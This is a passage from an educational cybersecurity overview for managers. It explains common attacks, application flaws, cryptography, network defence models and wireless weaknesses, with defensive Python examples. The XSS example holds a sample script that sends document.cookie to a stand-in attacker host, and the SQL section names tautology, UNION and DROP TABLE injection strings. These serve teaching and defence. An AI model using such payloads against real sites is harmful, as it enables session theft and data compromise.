SOCIAL ENGINEERING ATTACKS
Although social engineering is closely associated with cybersecurity today, it is not restricted to weaknesses in computer and network systems. Several long-established methods of intercepting information still work for gathering important details about a target. Managers must be familiar not only with social engineering carried out over the Internet and social media, but also with the ordinary, yet effective, data theft tactics used in the physical world: following an employee through a secured door, reading documents left on a desk, or retrieving printouts from the trash. Most important, managers should know the existing countermeasures and how staff should be trained to recognize and handle social engineering attempts. While security software can protect the institution in several ways at the network level, physical security must not be undervalued or ignored when it comes to social engineering.
In the cyber domain today, malware such as spyware, adware, worms and trojan horses has become an ordinary form of attack. These threats have existed for a long time, but their sophistication keeps growing almost daily. Not only do they inflict serious damage on end users, they cause countless problems for network security professionals, whose job is not only to determine where an attack originated, but also to find the best way to prevent it from recurring and to raise an alert while it is taking place. It would be one thing if these attacks occurred occasionally, but they happen continuously, adding to the ever-growing burden on network security professionals.
COMMON TYPES OF CYBERATTACKS
As we know from history, no two battles are the same. Not only do they pursue different goals, they are also distinguished by a unique set of features and conditions. The same holds for today's cyberattacks, and that is why understanding the latest exploits is essential. In this evolving environment, the need for skilled and knowledgeable professionals has never been more immediate. While your experience as a manager in the field is helpful, it is likely not sufficient to prepare you for ever-changing security needs. For this, it is essential that you be able to perform threat analysis and risk mitigation based on an understanding of the related policies, laws, and regulations.
Types of Common Cyberattacks:
- Man-in-the-Middle (MITM): this type of attack secretly inserts the attacker into a communication between two parties who believe they are talking directly to each other. By eavesdropping on or intercepting traffic, for example on an open wireless network, a MITM attacker can read a private conversation and alter it to suit their needs.
- Denial of Service (DoS): this attack also targets online services, but with an entirely different tactic. During a DoS attack the targeted server, system, network, or website is flooded with so much traffic, or so many requests, that it is overwhelmed and can no longer serve legitimate users; when the flood comes from many sources at once it is called a distributed denial of service (DDoS).
- Replay Attack: this attack captures a valid transmission on the network and repeats or delays it. By recording data such as an authentication exchange without authorization and later retransmitting it, the attacker deceives the receiver into acting on it, reusing valid login data to gain access to the network.
- Spoofing: once an attacker has a foothold on a network, they can extend it by impersonating another device to attack network hosts, steal information, spread malware, or bypass access controls. There are various types of spoofing; some of the more familiar ones forge the source IP address of packets so that replies are directed at a victim, overloading the target with network traffic.
- Phishing: this attack attempts to capture data by pretending to be something it is not. An attacker may impersonate a reputable entity, such as a friend or a professional organization. The phishing message tries to convince the end user that it comes from a trusted source, like Facebook or another legitimate website, and entices the user to click a link that leads to a credential-harvesting page or delivers malware.
- Brute Force: this attack uses trial and error to recover a password or key. It relies on no ingenious strategy; it simply tries as many combinations as possible, as fast as possible, until one works. Its cost grows with the size of the search space, which is why long keys and long, unpredictable passwords resist it.
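To make the replay item concrete, here is an added example (not from the original text) of a request format that resists replay: each request carries a fresh random nonce and a timestamp, both bound to the action by an HMAC over a key shared between client and server, and the server refuses anything with a bad MAC, a stale timestamp, or a nonce it has already accepted. The shared key, the action strings and the skew window are constructed for the example.

```python
import hashlib
import hmac
import secrets
import time

# Shared secret between client and server. Constructed for this example.
SHARED_KEY = b"example-shared-key-do-not-reuse"
# How far a request timestamp may drift from server time before rejection.
MAX_SKEW_SECONDS = 30


def sign_request(key: bytes, action: str, nonce: str, timestamp: int) -> str:
    """Bind action, nonce and time into one MAC so none can be altered alone."""
    message = f"{action}|{nonce}|{timestamp}".encode()
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def make_request(key: bytes, action: str, now: int) -> dict:
    """Client side: a fresh, unpredictable nonce per request."""
    nonce = secrets.token_hex(16)
    return {
        "action": action,
        "nonce": nonce,
        "timestamp": now,
        "mac": sign_request(key, action, nonce, now),
    }


class ReplayGuard:
    """Server side: accept each nonce at most once, and only while fresh."""

    def __init__(self, key: bytes):
        self.key = key
        self.seen_nonces = set()   # nonces accepted inside the skew window

    def verify(self, request: dict, now: int) -> tuple:
        # 1. Integrity and origin: recompute the MAC, compare in constant time.
        expected = sign_request(self.key, request["action"],
                                request["nonce"], request["timestamp"])
        if not hmac.compare_digest(expected, request["mac"]):
            return False, "bad mac"
        # 2. Freshness: a delayed copy is rejected even though its MAC is valid.
        #    This also bounds how long the nonce set has to be remembered.
        if abs(now - request["timestamp"]) > MAX_SKEW_SECONDS:
            return False, "stale timestamp"
        # 3. Uniqueness: an exact repeat of an accepted request is a replay.
        if request["nonce"] in self.seen_nonces:
            return False, "replayed nonce"
        self.seen_nonces.add(request["nonce"])
        return True, "ok"


def demo() -> list:
    """Walk through capture, replay, tamper and delay; return the verdicts."""
    server = ReplayGuard(SHARED_KEY)
    t0 = int(time.time())
    req = make_request(SHARED_KEY, "transfer:100:to:alice", t0)
    verdicts = [server.verify(req, t0)[1]]               # genuine request
    verdicts.append(server.verify(req, t0 + 5)[1])       # attacker replays it
    tampered = dict(req, action="transfer:100:to:mallory")
    verdicts.append(server.verify(tampered, t0)[1])      # attacker alters it
    late = make_request(SHARED_KEY, "transfer:1:to:alice", t0)
    verdicts.append(server.verify(late, t0 + 3600)[1])   # delayed by an hour
    return verdicts
```

The nonce alone stops exact replays and the timestamp alone stops old captures; the two together let the server forget nonces older than the skew window instead of storing them forever. A captured request is useless to the attacker without the key, since changing any field invalidates the MAC.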
Application and Networking-Based Attacks:
Today's attackers are not content with targeting operating systems to find their way into a system; most attacks are made on the applications running on the victim system. These attacks are especially alarming because the attacker targets the application layer (Layer 7 of the OSI seven-layer model), which is typically where the sensitive resources live. Because managers need to be aware of these threats, some of the most notorious application attacks are described here: cross-site scripting (XSS), SQL injection, buffer overflow attacks and remote code execution.
Cross-site scripting (XSS) occurs when the attacker delivers malicious script to another user through a web application, so that the script executes in the victim's browser. There are two common ways for this to happen: in reflected XSS, data from an untrusted source arrives in a web request and is echoed back into the page the server returns; in stored XSS, the attacker enters the data into dynamic content (a comment or profile field, for example) where it is later served to an unsuspecting user whose browser has no way to tell it from the site's own script. In both cases the root cause is the same: untrusted input is written into HTML without being validated or encoded for the context in which it appears.
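As an added illustration (not part of the original page), the following Python renders a user comment into a page the vulnerable way and the hardened way. The comment strings, the page template, the tag names and the foreign_tags helper are constructed for the example; the hardening is output encoding for the HTML context with the standard library's html.escape.

```python
import html
import re

# Constructed sample inputs: one ordinary comment and two XSS payloads.
SAMPLE_COMMENTS = [
    "Great article, thanks!",
    "<script>document.location='https://attacker.example/?c='+document.cookie</script>",
    '"><img src=x onerror="alert(document.domain)">',
]

# Page template; the application's own markup uses only these tags.
PAGE = "<html><body><h1>Comments</h1>{body}</body></html>"
TRUSTED_TAGS = {"html", "body", "h1", "p", "input"}
_TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][\w-]*)")


def render_unsafe(comment: str) -> str:
    """Vulnerable: untrusted text is concatenated straight into the HTML."""
    return PAGE.format(body=f"<p>{comment}</p>")


def render_safe(comment: str) -> str:
    """Hardened: encode for the HTML text context before insertion."""
    return PAGE.format(body=f"<p>{html.escape(comment, quote=True)}</p>")


def render_attr_safe(comment: str) -> str:
    """Same input placed in an attribute: encode, and always quote the value."""
    value = html.escape(comment, quote=True)
    return PAGE.format(body=f'<input type="text" value="{value}">')


def foreign_tags(rendered: str) -> list:
    """Tags in the output that the application never wrote, i.e. injected markup."""
    return [m.group(1).lower() for m in _TAG_RE.finditer(rendered)
            if m.group(1).lower() not in TRUSTED_TAGS]
```

The second payload shows why the encoding must cover quotes as well as angle brackets: without escaping the double quote it closes the attribute and opens a new tag. Encoding is context-specific; html.escape is right for HTML text and quoted attributes, but a value written into a JavaScript string or a URL needs the encoding for that context.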
Injection attacks are made by inserting, or "injecting," SQL into a query from client-supplied input. When executed, these attacks let the attacker read private information from the database or even change it using INSERT, UPDATE, or DELETE statements. An experienced attacker can go further and shut down the whole DBMS or, in extreme cases, make the host operating system run commands. There are many known injection variants, but the two most common are:
- Command Injection: an SQL fragment is supplied in place of a normal input value in a string field. Instead of returning information about the user's input, the query that runs on the server side now returns whatever result set the attacker asked for.
- Numeric Parameter Attack: numeric parameters are susceptible to SQL injection because weakly typed languages such as PHP do not force a variable to keep its initial data type, and numeric values are often concatenated into a query without surrounding quotes. It is therefore possible to insert a crafted SQL statement into any vulnerable parameter. Once the attacker has confirmed the expected data type, the attack proceeds the same way it would against a vulnerable string parameter.
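The following added example (not the page's own code) shows both injection variants against an in-memory SQLite table with constructed sample rows, alongside the parameterised queries that stop them. The table, its rows and the function names are assumptions for the example.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory database with constructed rows; stands in for the real DBMS."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT, api_key TEXT);
        INSERT INTO users VALUES (1, 'alice', 'user',  'key-alice-1111');
        INSERT INTO users VALUES (2, 'bob',   'user',  'key-bob-2222');
        INSERT INTO users VALUES (3, 'admin', 'admin', 'key-admin-9999');
    """)
    return conn


# --- vulnerable: string parameter ------------------------------------------
def find_by_name_unsafe(conn, username: str) -> list:
    # The quote in the input closes the literal; the rest becomes SQL.
    sql = f"SELECT id, username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


# --- vulnerable: numeric parameter, no quotes to escape at all --------------
def find_by_id_unsafe(conn, user_id: str) -> list:
    sql = f"SELECT id, username, role FROM users WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


# --- hardened: parameterised queries plus type enforcement ------------------
def find_by_name_safe(conn, username: str) -> list:
    # The driver sends the value separately; it can never become SQL.
    return conn.execute(
        "SELECT id, username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def find_by_id_safe(conn, user_id: str) -> list:
    # Enforce the type the parameter is supposed to have before it is used.
    try:
        uid = int(user_id)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, username, role FROM users WHERE id = ?", (uid,)
    ).fetchall()
```

SQLite's execute() refuses stacked statements, so the example uses a tautology (' OR '1'='1) and a UNION to dump the api_key column; on a DBMS that allows stacking, the same concatenation also lets "; DROP TABLE users" through. Parameterisation is the fix in both cases; input validation on the numeric path is defence in depth, not a substitute.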
BROKEN AUTHENTICATION & SESSION MANAGEMENT
Authentication and session management covers verifying who a user is, giving users the appropriate level of access to data, and managing their sessions. The importance of authentication cannot be overstated, yet incorrect credential or session handling can make an otherwise flawless authentication scheme fail. These attacks typically occur when the server side fails to manage sessions properly. For example, a user might have logged out from the website, but because the session was not invalidated on the server at logout, an attacker holding the old session identifier was still able to send a forged "change password" request.
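The logout flaw described above, as an added example that is not part of the original text: a server-side session store that issues fresh identifiers at login, drops them at logout or after an idle timeout, and re-checks the current password before a password change. The session lifetime, the account data and the class names are assumptions for the example.

```python
import secrets
import time

SESSION_LIFETIME = 15 * 60  # seconds of inactivity before a session dies


class SessionStore:
    """Server-side session table: the cookie is only an opaque lookup key."""

    def __init__(self):
        self._sessions = {}  # session_id -> {"user": str, "last_seen": float}

    def login(self, user: str, now: float) -> str:
        # A fresh, unguessable identifier is issued at every login; never
        # reuse one supplied by the client (that would allow session fixation).
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "last_seen": now}
        return sid

    def logout(self, sid: str) -> None:
        # The flaw in the text: forgetting this line leaves the old session
        # valid for whoever still holds the identifier.
        self._sessions.pop(sid, None)

    def user_for(self, sid: str, now: float):
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if now - entry["last_seen"] > SESSION_LIFETIME:
            self._sessions.pop(sid, None)  # idle timeout
            return None
        entry["last_seen"] = now
        return entry["user"]


class AccountService:
    def __init__(self, store: SessionStore):
        self.store = store
        self.passwords = {"alice": "correct horse"}  # constructed sample data

    def change_password(self, sid: str, current: str, new: str, now: float) -> str:
        user = self.store.user_for(sid, now)
        if user is None:
            return "rejected: no valid session"
        # Re-authenticate for sensitive operations so a hijacked session
        # alone is not enough to take over the account.
        if self.passwords.get(user) != current:
            return "rejected: wrong current password"
        self.passwords[user] = new
        return "ok"


def demo() -> list:
    """Genuine change, replayed identifier after logout, idle timeout, wrong password."""
    store = SessionStore()
    svc = AccountService(store)
    t0 = time.time()
    sid = store.login("alice", t0)
    results = [svc.change_password(sid, "correct horse", "battery staple", t0 + 1)]
    store.logout(sid)
    # Attacker who captured the cookie earlier tries the stale identifier.
    results.append(svc.change_password(sid, "battery staple", "pwned", t0 + 2))
    sid2 = store.login("alice", t0 + 10)
    # Session left idle past the timeout.
    results.append(svc.change_password(sid2, "battery staple", "pwned", t0 + 10 + SESSION_LIFETIME + 1))
    sid3 = store.login("alice", t0 + 20)
    # Valid session but the attacker does not know the current password.
    results.append(svc.change_password(sid3, "nope", "pwned", t0 + 21))
    return results
```

Keeping session state on the server is what makes logout meaningful: the client cannot "un-logout" by presenting the old cookie, because the server no longer has a record for it.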
BUFFER OVERFLOW ATTACKS
Buffer overflow attacks happen when an attacker writes more data into a buffer than it can hold, overwriting adjacent memory of the process. An example is overwriting saved control data on the stack, such as the return address that will be loaded into the instruction pointer (IP) or the saved base pointer (BP); as a result the program begins crashing with unexpected segmentation faults and exceptions, or, if the overwritten values are chosen carefully, executes code of the attacker's choosing. Buffer overflows occur on the stack (stack overflow) or on the heap (heap overflow).
Host, Application, and Data Security
The network should be protected by many layers of security against unwanted intrusion. Generally, user machines within the network are protected from outside hosts by the firewall, which limits access to them. Nevertheless, a good security model requires the support of everyone affected by it, so it is important that users' personal machines are secure as well. This is particularly important for clients that connect to the organization's network from outside, over networks the organization does not control, whether via a VPN or any other means. Completely securing the organization's network means securing these hosts too.
SECURING THE HOST
Security in host-based computing continues to be an area of ongoing research. Challenges in host-based security fall into three principal areas: protecting applications, protecting the host environment, and protecting data. These three topics mirror the security issues identified for mobile agents: protecting agents from hostile hosts, protecting hosts from agents, and protecting data in transit. A parallel can be drawn between mobile agents and host-based applications, since both perform computations on the host.
A firewall is required to protect the host, and the operating system and all necessary patches should be kept up to date, especially if the host will be connected to a network during installation. Most operating systems are vulnerable to compromise as first installed and require many patches and updates before they can safely be placed on the network. If a host is connected to a department network without its own protection, the department firewall that shields the network from outside threats does nothing to protect it from another machine on the same department network while it is being installed and configured.
A software "vulnerability" is a flaw in an application that leads it to process important data in an insecure way. By taking advantage of these "holes," attackers can gain access to an organization's systems and steal confidential data. Practically every application has vulnerabilities: commercial software, financial services software, and software written by government agencies are all vulnerable.
Before tools and technologies are applied to application security, a successful solution should start with a strong strategy. At a high level, the strategy should address, and continually improve, these key steps: identifying vulnerabilities, assessing their risk, fixing the flaws, learning from mistakes, and managing future development processes better.
The end result for the organization should be a technologically advanced application security procedure that:
- Evaluates every application, whether built in-house, purchased, or assembled from third-party components
- Permits developers to find and fix vulnerabilities as they are coding
- Takes advantage of cloud-based services to more easily incorporate security into the development process and scale the program
The first phase in protecting data is to identify the types of information that need protection and where that information is exposed in the organization. Once this audit is complete, the organization's priority data must be identified to determine the level of risk if that data is lost. The next phase is to assess the applications and learn which areas of each application leave the organization vulnerable to external attack.
The success of data security, data privacy and data protection centers on:
- Accuracy of data loss prevention content analysis engines.
- Scalability of data security solutions.
- Method of the data security policy definition and process management capabilities.
- Developing clear data security strategies with specific requirements before evaluating products.
- Realizing the limitations of traditional data privacy protection and data security.
- Using application security testing as a way of protecting data.
Highly valued information must be protected completely, so a second layer of protection is used as well: encryption. Encryption is accomplished through cryptography, the science of transforming information into a form that unauthorized individuals cannot read. Cryptography protects the confidentiality of information by ensuring that only authorized individuals can read it, protects the integrity of information so that alteration can be detected, and helps guarantee availability in the sense that authorized users who possess the key can access the data. Cryptography can also provide nonrepudiation, which stops an individual from fraudulently "reneging" on an action, and can verify the authenticity of the sender. Three common types of cryptographic algorithm are used to protect data: hashing, symmetric encryption, and asymmetric encryption.
In symmetric encryption, the sender and receiver each hold a copy of the same "key," which is used both to encrypt and to decrypt messages. Symmetric encryption depends entirely on the key being kept secret: anyone who obtains it can read and forge messages. Distributing the key securely is therefore one of the major challenges of symmetric encryption. Provided the key stays secret, symmetric cryptography (AES, for example) offers strong protection against attack.
Asymmetric encryption uses a mathematically related pair of keys: the sender and the receiver use different "keys" to encrypt and decrypt messages. A public key, which can be shared freely, encrypts the message, and the matching private key, known only to its owner, decrypts it. Reversing the roles gives asymmetric cryptography the security properties of authenticity and non-repudiation: when a message (in practice, its hash) is transformed with a private key to produce a signature, anyone holding the public key can check it, which establishes that the holder of the private key produced it and prevents the signer from later denying having done so. Cryptography plays a crucial role in modern applications such as digital signatures and HTTPS, and continues to be central to securing every aspect of digital communication.
The most basic type of cryptographic algorithm is a one-way hash algorithm. A hash algorithm creates a unique "digital fingerprint" of a set of data, a process usually called hashing. This fingerprint, called a message digest or hash, represents the data. While hashing is regarded as a cryptographic algorithm, its goal is not to create ciphertext that can later be decrypted. Rather, hashing is "one-way": the digest cannot be reversed to reveal the original data, and it should be infeasible to find two different inputs with the same digest. Hashing is used mainly for comparison, such as verifying that a downloaded file or a stored password matches what is expected.
A popular application of cryptography is digital certificates. Using digital certificates includes knowing their purpose, understanding how they are managed, and deciding which type of certificate is suitable for which situation. A digital certificate associates a user's identity with a public key, and that association has been "digitally signed" by a trusted third party (a certificate authority). The third party confirms the owner and that the public key belongs to that owner. Digital certificates are essentially a container for a public key, yet they can also contain other user-supplied information, such as basic registration details (name, postal address, email) and attributes such as country or region, age, and gender. Digital certificates can also be used to identify objects such as servers and applications.
A practical application of cryptography is the digital signature, a signature applied digitally. Digital signatures provide authentication, integrity, and non-repudiation; they do not by themselves provide confidentiality, which requires encryption. With business transactions occurring all around the world, manually signing a document and transporting it between locations is time-consuming. By digitally signing documents, a transaction can be completed promptly, and when two parties who may never have met each other must sign documents relating to a transaction, digital signatures ensure both timeliness and authenticity.
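To tie the hashing, asymmetric-key and digital-signature paragraphs above together, here is an added example (not from the original text) that hashes a document and signs the digest with a textbook RSA key pair. The key is built from two fixed Mersenne primes so the block runs offline and deterministically; a 92-bit modulus, truncating the digest to fit it, and the absence of padding make this a teaching toy, not a usable signature scheme (use RSA-PSS or Ed25519 from a maintained library in practice). The document text is constructed for the example.

```python
import hashlib

# Toy RSA key with fixed primes: p = 2**61 - 1 and q = 2**31 - 1 are both prime.
# A 92-bit modulus is hopelessly weak; it is used only so the arithmetic is visible.
P = 2**61 - 1
Q = 2**31 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent, e*d == 1 mod phi(n)

PUBLIC_KEY = (N, E)    # distributed to anyone who must verify
PRIVATE_KEY = (N, D)   # known only to the signer


def digest(data: bytes) -> bytes:
    """One-way fingerprint: any change to data changes the digest."""
    return hashlib.sha256(data).digest()


def _digest_as_int(data: bytes) -> int:
    # The toy modulus is only 92 bits, so use the first 88 bits of the
    # SHA-256 digest. A real scheme pads the whole digest up to the modulus size.
    return int.from_bytes(digest(data)[:11], "big")


def sign(private_key, data: bytes) -> int:
    """Hash, then apply the private key: only its holder can do this."""
    n, d = private_key
    return pow(_digest_as_int(data), d, n)


def verify(public_key, data: bytes, signature: int) -> bool:
    """Apply the public key and compare with a fresh hash of the data."""
    n, e = public_key
    return pow(signature, e, n) == _digest_as_int(data)


def demo() -> dict:
    """Sign a contract, then check a valid copy and a tampered one."""
    contract = b"Pay 1,000 to Alice by 2024-06-30."
    signature = sign(PRIVATE_KEY, contract)
    forged = contract.replace(b"1,000", b"9,000")
    return {
        "hash_changes": digest(contract) != digest(forged),        # integrity
        "valid": verify(PUBLIC_KEY, contract, signature),          # authenticity
        "tampered_detected": not verify(PUBLIC_KEY, forged, signature),
    }
```

The verifier needs only the public key, so anyone can check the signature, while producing it required the private key; that asymmetry is what gives non-repudiation, which a shared-key MAC cannot provide because both parties could have computed it.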
Hypertext Transfer Protocol (HTTP) is the protocol that makes communication on the Web possible; it is the essential part of the World Wide Web. HTTP is a stateless protocol, meaning the server does not remember the client once a request and its response are over. HTTPS is HTTP running on top of SSL (Secure Sockets Layer) or its successor, TLS (Transport Layer Security). Because many everyday transactions are done online, important data like credit card numbers and bank account numbers are transmitted over the Internet. This critical data must not fall into criminal hands, where it could be used for illegal purposes, so the communication between server and client must be secured. SSL/TLS provides this secure channel using cryptography: the server presents a certificate so the client can authenticate it, the two sides agree on session keys, and the data is then encrypted and integrity-protected. Most users recognize a secured connection by the "padlock" on the left of the address bar and the "https" instead of "http."
Network Security Fundamentals
There are three fundamental methods used to achieve network security, and organizations typically use some combination of them. The three methods are security by obscurity, the perimeter defense model, and the defense in depth model.
Security by Obscurity
Security by obscurity depends on stealth for protection. The thought behind this approach is that if no one knows a network or system exists, it will not be exposed to attack. The plan is simply to hide the network, or at least not advertise its existence, on the assumption that this provides adequate security. The problem with this method is that it never works in the long run, and once discovered, the network is completely exposed.
The Perimeter Defense
The perimeter defense model is comparable to a castle surrounded by a moat. Using this method, organizations harden perimeter systems and border routers, or "hide" the network behind a firewall that separates the protected network from an untrusted one. Very little is done to secure the other systems on the network. The idea is that the perimeter defenses are adequate to block any intruder, so the internal systems will be secure.
There are several defects in this method. First, it does nothing to defend internal systems from an internal attack, and many attacks on company networks are launched by insiders. Second, perimeter security nearly always fails eventually, and once it does, the internal systems are left exposed.
The Defense in Depth
The strongest method is the defense in depth model. Defense in depth strives for security by hardening and monitoring each system, so that each system defends itself. Extra measures are still taken on the perimeter systems, but the security of the internal network does not rely exclusively on them. This method is harder to accomplish and requires that all system and network administrators do their share. However, with defense in depth the internal network is much less likely to be compromised if an administrator makes an error such as attaching an unsecured modem to a system. If the system with the modem is compromised, the other systems on the network are still able to protect themselves, and should also be able to notice any attempted attacks from the compromised system. This approach likewise provides more protection against an internal attacker, whose activities are more likely to be detected.
Administering a Secure Network
Administering a secure network requires more than installing security updates and monitoring for intrusions. It also involves making reasonable decisions regarding security, and sometimes security decisions are anything but reasonable. A network that is not properly maintained through proven administrative procedures is vulnerable to attackers. Administering a secure network therefore requires, first, an understanding of the common network protocols and the security issues they carry; next, the application of basic network administration principles; and lastly, securing three general types of network application: IP telephony, virtualization, and cloud computing.
Common Network Protocols
Network protocols, the rules for communication, are essential for proper communication between network devices. The most common protocol used today for both local area networks (LANs) and the Internet is Transmission Control Protocol/Internet Protocol (TCP/IP). TCP/IP is not a single protocol but a protocol suite: many protocols, organized in four layers, that function together. The two that give the suite its name, TCP and IP, are deemed the most important. IP functions primarily at the Open Systems Interconnection (OSI) Network Layer (Layer 3) to provide addressing and routing. TCP is the main Transport Layer (Layer 4) protocol, responsible for establishing connections and reliable data transport between devices. The four layers of the TCP/IP model are Application, Transport, Internet, and Network Interface. The TCP/IP protocols most associated with security concerns are Internet Control Message Protocol (ICMP), Simple Network Management Protocol (SNMP), Domain Name System (DNS), file transfer and storage protocols, NetBIOS, and Telnet.
Network Administration Principles
Administering a secure network can be difficult and challenging. It is imperative that network security administration follow a rule-based management process that relies on defined technical and procedural rules, rather than letting security practices develop haphazardly. Procedural rules are the authoritative and prescribed guidance for conduct. For data security they may be external to the organization, such as the Health Insurance Portability and Accountability Act of 1996, the Sarbanes-Oxley Act of 2002, or the Gramm-Leach-Bliley Act, or internal. The procedural rules in turn drive technical rules, which may include configuring a firewall or proxy server to comply with them.
Securing Network Applications
IP telephony, virtualization, and cloud computing are relatively new network applications and platforms that call for special security attention. The most evident of these integration efforts is the convergence of voice and data traffic over a single Internet Protocol (IP) network.
- IP telephony uses a data-based IP network to carry digital voice clients and new voice applications alongside data. Building one combined network for voice, video, and data may improve security because only one network must be managed and protected. Nevertheless, IP telephony is not immune to attack: because it runs over IP networks, it is exposed to the same attackers and techniques as any other IP service.
- Virtualization is a means of presenting and managing computer resources by function without regard to their physical layout or location. It is used extensively to consolidate network and web servers so that several virtual servers run on a single physical computer. Because a typical server runs at only about 10 percent of its capacity, there is spare capacity for running virtual machines. Virtual machines must be secured both from external networks and from other virtual machines on the same physical computer. In a network without virtual machines, external devices such as firewalls and IDSs placed between physical servers help stop one server from infecting another, but no such physical devices sit between virtual machines on the same host.
- Cloud computing, in which customers pay only for the online computing resources they need, has emerged as an innovative idea that significantly affects all areas of IT, including network design, applications, procedures, and even personnel. Despite its benefits, cloud computing presents important security concerns. It is imperative that the cloud provider ensure that only authorized users are given access while attackers are blocked. All transmissions to and from "the cloud" must be adequately secured. Lastly, each customer's information must be properly separated from that of other customers, and the highest level of application availability and security must be provided.
WIRELESS NETWORK SECURITY
Wi-Fi signals are not stopped by walls or doors, so the user has exceptional mobility and can move freely while still connected to the network. However, this feature is also a security problem. Because a wireless signal is not confined within the walls of a building, an unauthorized user can pick it up outside the building's security perimeter. For example, an attacker waiting in the parking lot with a wireless laptop could connect to the wireless network. This would permit the attacker to introduce malware into the network, or to eavesdrop on the wireless communications and read everything being transmitted.
Three common classes of attack can be targeted against wireless data systems: attacks on Bluetooth systems, on near field communication devices, and on wireless local area networks.
- Bluejacking and bluesnarfing are two Bluetooth attacks. Bluejacking sends unwanted messages, and also images and sounds, to Bluetooth-enabled devices. Bluesnarfing accesses data without authorization from a wireless device through a Bluetooth connection, frequently between cell phones and laptop computers.
- Near field communication (NFC) devices carry risks inherent in the technology. The NFC exchange between a device and a terminal can be intercepted and read by an attacker who is close enough to pick up the signal, so users must be alert. NFC applications should therefore encrypt their communication.
- Various wireless attacks can be targeted at the enterprise, including rogue access points (APs), evil twins, interception of wireless data, wireless replay attacks, and wireless denial of service. Through these, attackers can bypass the security protections of the company's network. The most common wireless attack is intercepting and reading the data being transmitted, known as packet sniffing: an attacker captures the RF signal from an open or misconfigured AP and reads any confidential wireless communication. To make matters worse, if the attacker manages to connect to the enterprise wired network through a rogue AP, they can also examine broadcast and multicast wired network traffic that leaks onto the wireless side.
VULNERABILITIES OF IEEE WIRELESS SECURITY
Wired Equivalent Privacy (WEP) is an IEEE 802.11 security protocol created to ensure that only authorized persons can view transmitted wireless information. WEP has several security vulnerabilities. WEP can use only a 64-bit or 128-bit value for encryption, made up of a 24-bit initialization vector (IV) and either a 40-bit or 104-bit default key; even when the longer 128-bit value is used, the IV remains 24 bits. The IV is sent in the clear with each frame and combined with the key to produce the RC4 keystream for that frame, so with only 2^24 (about 16.7 million) possible IVs, a busy network reuses an IV within hours. An attacker who intercepts packets for that long can spot the duplicated IVs; two frames encrypted with the same keystream let the attacker recover their plaintext and, with enough captured frames, the key itself.
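As an added worked example (not from the original text), the following Python quantifies the IV weakness: the birthday bound gives the probability that an IV repeats among a given number of frames and the frame count at which a repeat becomes more likely than not, a second function shows how quickly a busy access point exhausts the IV space even if it never reuses an IV early, and a simulation picks random 24-bit IVs and reports the frame at which the first reuse occurs. The traffic rate in the usage note is an assumption.

```python
import math
import random

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS          # 16,777,216 possible initialization vectors


def iv_collision_probability(frames: int, iv_bits: int = IV_BITS) -> float:
    """Birthday bound: probability that at least one IV repeats among `frames`."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))


def frames_for_probability(target: float, iv_bits: int = IV_BITS) -> int:
    """Smallest frame count at which the repeat probability reaches `target`."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(-2.0 * space * math.log(1.0 - target)))


def hours_to_exhaust_ivs(frames_per_second: float, iv_bits: int = IV_BITS) -> float:
    """Even a sender that counts IVs sequentially must wrap after 2**iv_bits frames."""
    return (2 ** iv_bits) / frames_per_second / 3600.0


def first_repeat(seed: int, iv_bits: int = IV_BITS) -> int:
    """Simulate a card that picks IVs at random; return the frame index of the first reuse."""
    rng = random.Random(seed)     # seeded so the simulation is reproducible
    seen = set()
    count = 0
    while True:
        count += 1
        iv = rng.getrandbits(iv_bits)
        if iv in seen:
            return count          # this frame shares a keystream with an earlier one
        seen.add(iv)
```

Assuming an access point moving about 1,000 frames per second, the whole IV space wraps in under five hours, and a card choosing IVs at random typically repeats one within the first 5,000 frames; this is why a patient attacker parked outside needs hours, not days, and why later protocols moved to 48-bit and larger nonces that are never reused.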
Wi-Fi Protected Setup (WPS) is an optional means of setting up security on wireless local area networks. WPS offers a Personal Identification Number (PIN) method, in which the user enters a PIN printed on the wireless router or displayed by a software setup wizard, and a push-button method, in which the user presses buttons on the devices and the security configuration takes place automatically. The design of the PIN method lets an attacker crack the PIN in under four hours and connect to the WLAN, defeating the restriction that only authorized users may connect. Wi-Fi Protected Access (WPA), though an advance over WEP, nevertheless has weaknesses as well.
Wi-Fi Protected Access 2 (WPA2) is the second generation of WPA security. WPA2 is built on the final IEEE 802.11i standard and is almost identical to it. The distinction is that WPA2 permits wireless clients using Temporal Key Integrity Protocol (TKIP) to operate in the same WLAN, whereas IEEE 802.11i does not. The encryption protocol used by WPA2 is the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), which is based on the CCM mode (a general-purpose block cipher mode providing both confidentiality and integrity) of the AES cipher that the WPA2 standard mandates.
A WLAN is identified by its Service Set Identifier (SSID). The SSID serves as the user-supplied name of the wireless network and can usually be any alphanumeric string of up to 32 characters. Although the SSID is normally broadcast so that any device can discover it, the broadcast can be disabled; then only users who know the "secret" SSID beforehand would be able to join the network. While this may seem to offer security by not advertising the SSID, it provides only weak protection: even when the SSID is omitted from beacon frames it is still transmitted in other management frames sent by the AP and its clients, so an attacker with a protocol analyzer can still identify it.
MOBILE DEVICE SECURITY
There are various types of mobile device. Portable computers (laptops and notebooks) are designed to include the most frequently used features of a standard computer in a smaller size that is easy to carry. Tablets and smartphones include an operating system that runs apps and accesses the Internet, offering a broad range of functionality. Mobile devices use flash memory for storage; all have local non-removable storage, and most also support removable storage.
RISKS ASSOCIATED WITH MOBILE DEVICES
